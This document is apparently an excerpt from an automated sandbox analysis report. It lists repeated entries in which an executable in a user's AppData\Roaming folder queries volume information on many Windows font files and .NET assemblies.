Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior

